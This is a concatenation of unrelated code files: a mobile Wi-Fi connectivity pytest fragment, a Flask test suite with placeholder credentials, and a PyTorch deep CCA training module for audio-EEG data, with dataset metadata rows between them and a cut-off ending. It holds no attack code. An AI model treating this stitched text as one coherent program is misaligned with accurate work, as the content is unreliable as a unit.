@allure.story('wpa wpa2 personal mixed 5 GHZ Band')
def test_wpa_wpa2_personal_5g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
| 46.585198 | 132 | 0.66057 | 3,000 | 27,066 | 5.686667 | 0.055667 | 0.093552 | 0.128019 | 0.095662 | 0.925264 | 0.917585 | 0.891676 | 0.872685 | 0.865651 | 0.855393 | 0 | 0.010441 | 0.239193 | 27,066 | 580 | 133 | 46.665517 | 0.818036 | 0.013633 | 0 | 0.810989 | 0 | 0 | 0.195908 | 0.003379 | 0 | 0 | 0 | 0 | 0.052747 | 1 | 0.026374 | false | 0.131868 | 0.030769 | 0 | 0.061538 | 0.079121 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
dec644cbd63f52c01ed79355da5f6076e4de28ee | 6,929 | py | Python | tests/test_views.py | Teddy-Schmitz/temperature_admin | dd899b4b7bd9d1e27f9e00c1eb65d11fdf49bfc8 | [
"MIT"
] | null | null | null | tests/test_views.py | Teddy-Schmitz/temperature_admin | dd899b4b7bd9d1e27f9e00c1eb65d11fdf49bfc8 | [
"MIT"
] | 1 | 2015-07-13T12:30:06.000Z | 2015-07-13T12:30:06.000Z | tests/test_views.py | Teddy-Schmitz/temperature_admin | dd899b4b7bd9d1e27f9e00c1eb65d11fdf49bfc8 | [
"MIT"
] | null | null | null | import base64
import json
from models.users import User
from models.event import Event, EventType
import pytest
def test_login_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users', headers=header)
assert resp.status_code == 200
def test_login_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:fail_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users', headers=header)
assert resp.status_code == 401
def test_required_login_views(test_client, session):
resp = test_client.get('/users')
assert resp.status_code == 401
resp = test_client.post('/users/test')
assert resp.status_code == 401
resp = test_client.post('/users/create')
assert resp.status_code == 401
resp = test_client.get('/users/delete/test')
assert resp.status_code == 401
resp = test_client.get('/poweron')
assert resp.status_code == 401
resp = test_client.get('/poweroff')
assert resp.status_code == 401
def test_index(test_client):
resp = test_client.get('/')
assert resp.status_code == 200
assert 'Temperature Admin' in resp.data
def test_receive_data_fail(test_client):
resp = test_client.post('/data')
assert resp.status_code == 400
def test_receive_data_success(test_client, fake_temperatures):
resp = test_client.post('/data', content_type='application/json',
data=json.dumps(dict(temperature=45.4, humidity=50.0)))
assert resp.status_code == 201
assert resp.data == 'Created'
def test_receive_event_fail(test_client):
resp = test_client.post('/event')
assert resp.status_code == 400
def test_receive_event_success(test_client, fake_events):
resp = test_client.post('/event', content_type='application/json',
data=json.dumps(dict(event='on', description='test')))
assert resp.status_code == 201
assert resp.data == 'Created'
def test_send_latest_event(test_client, fake_events):
resp = test_client.get('/event/last')
assert resp.status_code == 200
data = json.loads(resp.data)
assert data['results']['timestamp'] == fake_events.timestamp.timestamp
def test_send_events(test_client, fake_events):
resp = test_client.get('/event?range=15')
assert resp.status_code == 200
data = json.loads(resp.data)
assert len(data['results']) == 2
def test_send_data(test_client, fake_temperatures):
resp = test_client.get('/data?range=15')
assert resp.status_code == 200
data = json.loads(resp.data)
assert len(data['results']) == 2
def test_modify_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/test_user', headers=header, data=dict(password='changed_password'))
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 200
assert user.password == 'changed_password'
assert user.username == 'test_user'
def test_modify_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/bad_user', headers=header, data=dict(password='changed_password'))
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 404
assert user.password == 'test_password'
assert user.username == 'test_user'
def test_delete_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users/delete/test_user', headers=header)
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 200
assert user is None
def test_delete_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users/delete/bad_user', headers=header)
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 404
assert user.password == 'test_password'
assert user.username == 'test_user'
def test_create_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/create', headers=header, data=dict(username='test_user2', password='test_password'))
user = User.query.filter(User.username == 'test_user2').first()
assert resp.status_code == 200
assert user is not None
assert user.username == 'test_user2'
assert user.password == 'test_password'
def test_create_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/create', headers=header, data=dict(username='test_user2'))
user = User.query.filter(User.username == 'test_user2').first()
assert resp.status_code == 400
assert resp.data == 'Error'
assert user is None
@pytest.mark.json_data('{ "return_value": 1}')
def test_power_on(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweron', headers=header)
event = Event.last_event()
assert resp.status_code == 200
assert event.event == EventType.on
@pytest.mark.json_data('{ "return_value": 1}')
def test_power_off(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweroff', headers=header)
event = Event.last_event()
assert resp.status_code == 200
assert event.event == EventType.off
@pytest.mark.json_data('{ "return_value": 0}')
def test_power_on_failure(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweron', headers=header)
event = Event.last_event()
assert resp.status_code == 500
assert event is None
@pytest.mark.json_data('{ "return_value": 0}')
def test_power_off_failure(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweroff', headers=header)
event = Event.last_event()
assert resp.status_code == 500
assert event is None
| 33.8 | 120 | 0.70876 | 924 | 6,929 | 5.064935 | 0.102814 | 0.100427 | 0.077778 | 0.111111 | 0.882265 | 0.855128 | 0.846795 | 0.797009 | 0.751068 | 0.702137 | 0 | 0.025641 | 0.161351 | 6,929 | 204 | 121 | 33.965686 | 0.779728 | 0 | 0 | 0.601399 | 0 | 0 | 0.169866 | 0.046327 | 0 | 0 | 0 | 0 | 0.335664 | 1 | 0.146853 | false | 0.132867 | 0.034965 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
deea040a0e883c011f092468ee3a32523a966081 | 31,016 | py | Python | deep_models.py | iiscleap/deep-cca-for-audio-EEG | 44879e4a44566eaf41f2db1d7daffff7bcba6093 | [
"MIT"
] | 4 | 2020-12-03T08:08:03.000Z | 2021-06-23T14:54:51.000Z | deep_models.py | iiscleap/deep-cca-for-audio-EEG | 44879e4a44566eaf41f2db1d7daffff7bcba6093 | [
"MIT"
] | null | null | null | deep_models.py | iiscleap/deep-cca-for-audio-EEG | 44879e4a44566eaf41f2db1d7daffff7bcba6093 | [
"MIT"
] | 2 | 2021-06-23T14:55:25.000Z | 2021-11-04T21:14:26.000Z | import numpy as np
from os import path
import scipy.io
from pdb import set_trace as bp #################added break point accessor####################
from scipy.signal import lfilter
try: # SciPy >= 0.19
from scipy.special import comb, logsumexp
except ImportError:
from scipy.misc import comb, logsumexp # noqa
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn import Parameter
from torch.utils.data import DataLoader
from cca_functions import my_standardize, my_corr
from deep_nets import *
from deep_losses import *
device = torch.device('cuda')
torch.cuda.empty_cache()
# IF GIVEN 10 SEEDS, ALL THE MODELS GET ONE FORWARD PASS AND SEED WITH BEST VALIDATION IS SELECTED
# IF ONLY ONE SEED, THE WEIGHTS ARE INITIALIZED ACCORDINGLY
# TRAIN AND RETURN THE MODEL
# MODEL : model2_13
# LOSS : cca_loss
def dcca_model(stim_data, resp_data, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, best_only=True, path_name="", seeds=np.ceil(np.random.rand(10)*100)):
"""
ARGUMENTS:
stim_data : A THREE ELEMENT LIST OF STIMULI DATA ARRANGED AS: [STIM_TRAINING, STIM_VALIDATION, STIM_TEST]
resp_data : A THREE ELEMENT LIST OF RESPONSE DATA ARRANGED AS: [RESP_TRAINING, RESP_VALIDATION, RESP_TEST]
learning_rate : LEARNING RATE OF THE MODEL (DEFAULT: 1e-3)
use_all_singular_values : WHETHER THE MODEL SHOULD USE ALL THE SINGULAR VALUES IN THE CCA LOSS (DEFAULT: False)
epoch_num : NUMBER OF EPOCHS OF TRAINING (DEFAULT: 12)
batch_size : MINIBATCH SIZES FOR TRAINING THE MODEL (DEFAULT: 2048)
reg_par : REGULARIZATION PARAMETER FOR WEIGHT DECAY (DEFAULT: 1e-4)
dropout : DROPOUTS PERCENTAGE IN THE MODEL (DEFAULT: 0.05)
best_only : SAVE THE MODEL ONLY WITH THE BEST VALIDATION LOSS (DEFAULT: True)
path_name : WHERE THE MODEL IS TO BE SAVED. (DEFAULT: "")
seeds : SEED FOR THE DEEP MODEL. If given one seed, the model will be initialized with that seed.
IF given more than one seed, the seed with best val loss is selected.
RETURNS:
new_data : NEW REPRESENTATIONS AFTER PERFORMING DEEP CCA
correlations : THE TRAINING, VALIDATION AND TEST SET LOSSES WHILE TRAINING THE MODEL - TO TRACK THE MODEL AS TRAINING PROGRESSED.
model : THE TRAINED MODEL.
"""
stimtr = stim_data[0]
stimval = stim_data[1]
stimte = stim_data[2]
resptr = resp_data[0]
respval = resp_data[1]
respte = resp_data[2]
stimtr, mean1, std1 = my_standardize(stimtr)
resptr, mean2, std2 = my_standardize(resptr)
stimval = (stimval - mean1) / std1
stimte = (stimte - mean1) / std1
respval = (respval - mean2) / std2
respte = (respte - mean2) / std2
resp_tr = torch.from_numpy(resptr ).float()
resp_val = torch.from_numpy(respval).float()
resp_te = torch.from_numpy(respte ).float()
stim_tr = torch.from_numpy(stimtr ).float();
stim_val = torch.from_numpy(stimval).float();
stim_te = torch.from_numpy(stimte ).float();
data_tr = torch.cat([resp_tr, stim_tr ], 1)
data_val = torch.cat([resp_val, stim_val], 1)
data_te = torch.cat([resp_te, stim_te ], 1)
i_shape1 = resp_tr.shape[1]
i_shape2 = stim_tr.shape[1]
# best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
if (isinstance(seeds, int)):
seed = seeds
elif not(isinstance(seeds, int)) and len(seeds) == 1:
seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
models = [None] * len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
print('MODEL : {}'.format(seed_num))
model.eval()
torch.cuda.empty_cache()
tr_loss = 0 ; count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
tr_loss = tr_loss + loss
count = count + 1
del trs
tr_loss = tr_loss / count
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
models[seed_num] = model
first_and_last[seed_num] = [-tr_loss, -val_loss, -test_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_loss, -val_loss, -test_loss))
np.set_printoptions(precision=4)
idx = np.argsort(-first_and_last[:,1])
print(first_and_last[idx,1:])
print(seeds[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model_state_dict = []
min_loss = 0.00 ; min_loss2 = 0.00
correlations = np.zeros((epoch_num, 3))
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss = loss.item()
tr_loss = tr_loss + loss
count = count + 1
del trs
correlations[epoch, 0] = -tr_loss / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training CORRELATION : {:0.4f}'.format(correlations[epoch, 0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
correlations[epoch, 1] = -val_loss
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation CORRELATION : {:0.4f}'.format(-val_loss))
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
correlations[epoch, 2] = -test_loss
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test CORRELATION : {:0.4f}'.format(-test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
if val_loss < min_loss2:
min_loss2 = val_loss
model_file_name = path_name + '/best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
model.eval()
data2 = [data_tr, data_val, data_te]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data2[k].to(device)
pred_out = model(temp)
new_data.append([pred_out[0].cpu().numpy(), pred_out[1].cpu().numpy()])
# x1 = new_data[2][0]
# x2 = new_data[2][1]
# result = np.squeeze(my_corr(x1, x2, o_dim))
# print(result)
return new_data, correlations, model
# DMCCA MODEL WITH N RESPS AND 1 STIM
# IF GIVEN 10 SEEDS, ALL THE MODELS GET ONE FORWARD PASS AND SEED WITH BEST VALIDATION IS SELECTED
# IF ONLY ONE SEED, THE WEIGHTS ARE INITIALIZED ACCORDINGLY
# THE MODEL GETS TRAINED AND
# MODEL : dmcca_model_n_resp_1_stim
# LOSS : dmcca_model_loss
# RETURNS : NEW DATA, TRAINING LOSSES, AND THE TRAINED MODEL
def dmcca_model(all_data, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, best_only=True, lambda_=0.1, path_name="", mid_shape=60, seeds=np.ceil(np.random.rand(10)*100)):
"""
ARGUMENTS:
all_data : AN (N) ELEMENT LIST OF DATA WITH EACH ELEMENT AS: [DATA_i_TRAINING, DATA_i_VALIDATION, DATA_i_TEST]
ASSUMPTION :
THE FIRST (N-1) ELEMENTS ARE THE (N-1) EEG RESPONSES FOR A COMMON STIMULUS.
THE LAST 1 ELEMENT IS THE COMMON AUDITORY STIMULUS.
learning_rate : LEARNING RATE OF THE MODEL (DEFAULT: 1e-3)
use_all_singular_values : WHETHER THE MODEL SHOULD USE ALL THE SINGULAR VALUES IN THE CCA LOSS (DEFAULT: False)
epoch_num : NUMBER OF EPOCHS OF TRAINING (DEFAULT: 12)
batch_size : MINIBATCH SIZES FOR TRAINING THE MODEL (DEFAULT: 2048)
reg_par : REGULARIZATION PARAMETER FOR WEIGHT DECAY (DEFAULT: 1e-4)
dropout : DROPOUTS PERCENTAGE IN THE MODEL (DEFAULT: 0.05)
best_only : SAVE THE MODEL ONLY WITH THE BEST VALIDATION LOSS (DEFAULT: True)
lambda_ : MSE REGULARIZATION PARAMETER
path_name : WHERE THE MODEL IS TO BE SAVED. (DEFAULT: "")
seeds : SEED FOR THE DEEP MODEL. (DEFAULT: 10 RANDOM SEEDS)
RETURNS:
new_data : NEW REPRESENTATIONS AFTER PERFORMING DEEP CCA
training_losses : THE TRAINING, VALIDATION AND TEST SET LOSSES WHILE TRAINING THE MODEL - TO TRACK THE MODEL AS TRAINING PROGRESSED.
model : THE TRAINED MODEL.
"""
print('Started multiway DCCA.')
# data = [resp1, resp2, ..., respn, stim]
N = len(all_data)
torch.cuda.empty_cache()
data_tr = np.concatenate([i[0] for i in all_data], 1)
data_val = np.concatenate([i[1] for i in all_data], 1)
data_te = np.concatenate([i[2] for i in all_data], 1)
data = [data_tr, data_val, data_te]
i_shape1 = all_data[0][0].shape[1]
i_shape2 = all_data[-1][0].shape[1]
print(i_shape1)
print(i_shape2)
# EACH ONE : T x (R1 + R2 + STIM)
train_set = torch.from_numpy(data_tr).float()
val_set = torch.from_numpy(data_val).float()
te_set = torch.from_numpy(data_te).float()
[data_tr, data_val, data_te] = [train_set, val_set, te_set]
best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
if (isinstance(seeds, int)):
seed = seeds
elif not(isinstance(seeds, int)) and len(seeds) == 1:
seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
to_append = np.zeros((len(seeds), 3, int(comb(N,2))+1))
models=[None]*len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = dmcca_model_n_resp_1_stim(N-1, i_shape1, i_shape2, mid_shape, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), learning_rate, weight_decay=reg_par)
print('MODEL : {} for seed : {}'.format(seed_num, seed))
model.eval()
torch.cuda.empty_cache()
tr_corr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
_, corr_loss, _,neg_corrs,_ = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
trs = trs.cpu()
tr_corr_loss = tr_corr_loss + corr_loss
count = count + 1
del trs
tr_corr_loss = tr_corr_loss / (count)
to_append[seed_num, 0, :] = np.concatenate([[-tr_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
data_val = data_val.to(device)
val_ops = model(data_val)
_, val_corr_loss, _,neg_corrs,_ = dmcca_model_loss(data_val, val_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
to_append[seed_num, 1, :] = np.concatenate([[-val_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
data_te = data_te.to(device)
test_ops = model(data_te)
_, test_corr_loss, _,neg_corrs,_ = dmcca_model_loss(data_te, test_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
to_append[seed_num, 2, :] = np.concatenate([[-test_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
models[seed_num] = model
first_and_last[seed_num] = [-tr_corr_loss, -val_corr_loss, -test_corr_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_corr_loss, -val_corr_loss, -test_corr_loss))
nums = 1
results = np.zeros(nums)
idx = np.argsort(-first_and_last[:,1])
# print(first_and_last[idx,1:])
# print(idx)
# print(np.array(seeds)[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
training_lossses = []
new_data = []
torch.manual_seed(seed)
if torch.cuda.is_available() :
torch.cuda.manual_seed_all(seed)
model = dmcca_model_n_resp_1_stim(N-1, i_shape1, i_shape2, mid_shape, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model, training_losses = train_the_dmcca_model(model, model_optimizer, train_set, val_set, te_set, N, epoch_num, batch_size, o_dim, i_shape1, lambda_, use_all_singular_values, path_name)
model.eval()
data = [train_set, val_set, te_set]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data[k].to(device)
pred_out = model(temp)
del temp
new_data.append(pred_out)
return new_data, training_losses, model
# TRAINS THE MODEL IN dmcca_model
def train_the_dmcca_model(model, model_optimizer, data_tr, data_val, data_te, N, epoch_num, batch_size, o_dim, i_shape1, lambda_, use_all_singular_values, path_name, best_only=True):
"""
ARGUMENTS:
THE DMCCA MODEL TO BE TRAINED, THE MODEL'S OPTIMIZER, THE DATA FOR TRAINING, VALIDATING AND TESTING THE MODEL; AND ALL OTHER HYPERPARAMETERS REQUIRED TO TRAIN THE MODEL.
RETURNS:
THE TRAINED MODEL AND THE LOSSES WHILE TRAINING THE MODEL.
"""
print("Started training.")
best_epoch = 0
min_loss = 0.00
loss_epochs = np.zeros((epoch_num, 3))
corr_epochs = np.zeros((epoch_num, 3, int(comb(N,2)) + 1))
mses_epochs = np.zeros((epoch_num, 3, N+1))
model.to(device)
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss, _, _, _, _ = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0 ; tr_corrs = np.zeros(int(comb(N, 2))+1) ; tr_mses = np.zeros(N+1)
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss, corr, mse, neg_corrs, mses = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
trs = trs.cpu()
tr_loss = tr_loss + loss
tr_corrs = tr_corrs + np.concatenate([[-corr], -neg_corrs.detach().numpy()])
tr_mses = tr_mses + np.concatenate([[mse], mses.detach().numpy()])
count = count + 1
del trs
loss_epochs[epoch, 0] = tr_loss / (count)
corr_epochs[epoch, 0, :] = tr_corrs / (count)
mses_epochs[epoch, 0, :] = tr_mses / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training corr LOSS : {:0.4f}'.format(corr_epochs[epoch, 0, 0]))
# print("{} - {} = {} {}".format(corr_epochs[epoch, 0, 0], mses_epochs[epoch, 0, 0], -loss_epochs[epoch,0], corr_epochs[epoch, 0, 1:]))
print("{} - {} = {}".format(corr_epochs[epoch, 0, 0], mses_epochs[epoch, 0, 0], -loss_epochs[epoch,0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss, corr, mse, neg_corrs, mses = dmcca_model_loss(data_val, val_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
loss_epochs[epoch, 1] = val_loss
corr_epochs[epoch, 1, :] = np.concatenate([[-corr], -neg_corrs.detach().numpy()])
mses_epochs[epoch, 1, :] = np.concatenate([[mse], mses.detach().numpy()])
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation corr LOSS : {:0.4f}'.format(-corr))
# print("{} - {} = {} {}".format(-corr, mse, -val_loss, -neg_corrs))
print("{} - {} = {}".format(-corr, mse, -val_loss))
data_te = data_te.to(device)
print(data_te.shape)
test_ops = model(data_te)
test_loss, corr, mse, neg_corrs, mses = dmcca_model_loss(data_te, test_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
loss_epochs[epoch, 2] = test_loss
corr_epochs[epoch, 2, :] = np.concatenate([[-corr], -neg_corrs.detach().numpy()])
mses_epochs[epoch, 2, :] = np.concatenate([[mse], mses.detach().numpy()])
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test corr LOSS : {:0.4f}'.format(-corr))
# print("{} - {} = {} {}".format(-corr, mse, -test_loss, -neg_corrs))
print("{} - {} = {}".format(-corr, mse, -test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
model_file_name = path_name + 'best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
return model, [loss_epochs, corr_epochs, mses_epochs]
# DCCA MODELS WITH DIFFERENT ARCHITECTURES
# 13_2, 13_3, 15_4, 13_5, 100_2, 100_3, 100_4, 100_5, 10000_2, 10000_3, 10000_4,
def generic_dcca3(stim_data, resp_data, type, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, path_name="", seeds=np.ceil(np.random.rand(10)*100)):
"""
CAN BE USED TO ACCESS DIFFERENT DCCA MODELS FROM THE deep_nets.py.
THESE ARE THE MODELS EXPLORED AND REPORTED IN THE PAPER.
OTHER THAN SETTING THE DCCA MODEL, EVERYTHING ELSE IS SAME AS THE "dcca_model".
"""
stimtr = stim_data[0]
stimval = stim_data[1]
stimte = stim_data[2]
resptr = resp_data[0]
respval = resp_data[1]
respte = resp_data[2]
stimtr, mean1, std1 = my_standardize(stimtr)
resptr, mean2, std2 = my_standardize(resptr)
stimval = (stimval - mean1) / std1
stimte = (stimte - mean1) / std1
respval = (respval - mean2) / std2
respte = (respte - mean2) / std2
resp_tr = torch.from_numpy(resptr ).float()
resp_val = torch.from_numpy(respval).float()
resp_te = torch.from_numpy(respte ).float()
stim_tr = torch.from_numpy(stimtr ).float();
stim_val = torch.from_numpy(stimval).float();
stim_te = torch.from_numpy(stimte ).float();
data_tr = torch.cat([resp_tr, stim_tr ], 1)
data_val = torch.cat([resp_val, stim_val], 1)
data_te = torch.cat([resp_te, stim_te ], 1)
i_shape1 = resp_tr.shape[1]
i_shape2 = stim_tr.shape[1]
best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
if (isinstance(seeds, int)):
seed = seeds
elif not(isinstance(seeds, int)) and len(seeds) == 1:
seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
models = [None] * len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = None
if type == "13_2": model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_3": model = model3_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "15_4": model = model2_15(i_shape1, i_shape2, act, o_act, o_dim, dropout)
